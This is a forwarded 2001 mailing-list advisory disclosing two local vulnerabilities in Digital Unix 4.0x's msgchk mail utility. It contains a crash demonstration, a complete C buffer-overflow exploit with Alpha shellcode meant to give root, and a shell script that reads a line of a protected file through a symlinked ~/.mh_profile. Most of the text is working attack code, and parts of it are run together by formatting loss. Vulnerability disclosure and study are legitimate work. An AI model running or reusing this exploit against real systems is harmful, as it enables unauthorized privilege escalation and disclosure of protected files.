Hello everyone,
Just thought I would pass this along so we could all test it out and get
feeback on it.
-Will
-----Original Message-----
From:
Sent: Sunday, September 09, 2001 9:54 PM
Subject: Digital Unix 4.0x msgchk multiple vulnerabilities
hi everyone.
there were multiple vulnerabilities in "/usr/bin/mh/msgchk" on digital
unix 4.0x
it's a mail utility - check for messages (only available within the
message handlin
system, mh)
two vulnerabilities were found.
/usr/bin/mh/msgchk is affected to buffer overflow vulnerability
-- snip --
$ /usr/bin/mh/msgchk `perl -e 'print "A"x9000'`
AAAAAAAAAAAAA ... ...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA :
msgchk: no such user as AAAAAAAAAAAAAAAAAAAAAA ... ...
AAAAAAAAAAAAAAAAAAAAAAA
Memory fault(coredump)
-- snip --
exploit code is followed end of this document.
Next , /usr/bin/mh/msgchk has a vulnerability that anyone read 1 line
of the unprivileged file on the system
it's a old bug on redhat linux 2.0, but it also works on digital unix
4.0x
exploit script is also followed end of this document too.
i didn't test it on other version of digital unix or tru64 unix , but 4.0d
if stack is excutable, then overflow bug have you get root privilege ,
bug of ~/.mh_profile file control would make you read 1 line of
unprivileged file on the system.
++ msgchkx.c
/*
* 2001/09/05 - at the bench of windy fall
* /usr/bin/mh/msgchk buffer overflow exploit code by truefinder ,
seo_at_igrus.inha.ac.kr
* now we will drill /usr/bin/mh/msgchk
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define NOP 0x47ff041f
#define ALIGNSIZE (4 + 1 )
#define BUFSIZE (8000 + 211 )
#define RETADDR 0x000000011ffffaa0
#define DEFNOPSIZE 7168
char nop[] = { 0x1f, 0x04, 0xff, 0x47, 0x00 };
char retaddr[] = { 0xa0, 0xea, 0xff, 0x1f, 0x01 , 0x00 };
static char shellcode[] =
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
"\x11\x74\xf0\x47" /* bis $31,0x83,$17 */
"\x12\x94\x07\x42" /* addq $16,60,$18 */
"\xfc\xff\x32\xb2" /* stl $17,-4($18) */
"\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
"\x1f\x04\x31\x22" /* lda $17,0x041f($17) */
"\xfc\xff\x30\xb2" /* stl $17,-4($16) */
"\xf9\xff\x1f\xd2" /* bsr $16,-28 */
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
"\x31\x15\xd8\x43" /* subq $30,192,$17 */
"\x12\x04\xff\x47" /* clr $18 */
"\x40\xff\x1e\xb6" /* stq $16,-192($30) */
"\x48\xff\xfe\xb7" /* stq $31,-184($30) */
"\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
"\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
"\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
"\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
"\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
"\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
"\x38\xff\x7e\xb2" /* stl $19,-200($30) */
"\x13\x94\xe7\x43" /* addq $31,60,$19 */
"\x20\x35\x60\x42" /* subq $19,1,$0 */
"\xff\xff\xff\xff"; /* callsys ( disguised ) */
/* oh! this is ohhara's shellcode */
int
main(int argc, char *argv[] )
{
char *buf , *buf_ptr;
int bufsize , alignsize , offset ;
int i, totalsize;
bufsize = BUFSIZE ; alignsize = ALIGNSIZE ; offset = 0 ;
if ( argc < 1 ) { printf("usage : %s <bufsize>
<align> <offset>\n",
argv[0]);
exit (-1);
}
if (argc > 1 )
bufsize = atoi( argv[1] );
if ( argc > 2 )
alignsize = atoi( argv[2] ) + ALIGNSIZE ;
if ( argc > 3 )
offset = atoi ( argv[3] );
totalsize = alignsize + bufsize ;
buf = malloc( totalsize ) ;
memset ( buf, NULL , totalsize );
memset ( buf, 'A', alignsize );
buf_ptr = (char *)(buf + alignsize );
/* default nop size is 4096 bytes */
for ( i = 0 ; i < DEFNOPSIZE/4 ; i++ ) strcat (
buf_ptr , nop ); strcat ( buf_ptr, shellcode ); /* fill the
block with 'A' */ for ( i =0 ; i < bufsize - DEFNOPSIZE -
strlen(shellcode) - 8 ;i++ ) strcat( buf_ptr ,"A");
strcat ( buf_ptr , retaddr ); execl ("/var/tmp/mh/msgchk", "msgchk",
buf, NULL ); }++ msgchkx.sh#!/bin/sh# truefinder, seo_at_igrus.inha.ac.kr#
msgchk file read vulnerabilityif [ ! -f $1 ]then echo "usage : $0
<file path>"
fi
cd ~
ln -sf $1 ~/.mh_profile
/usr/bin/mh/msgchk
EOF
Received on Mon Sep 10 2001 - 17:31:19 NZST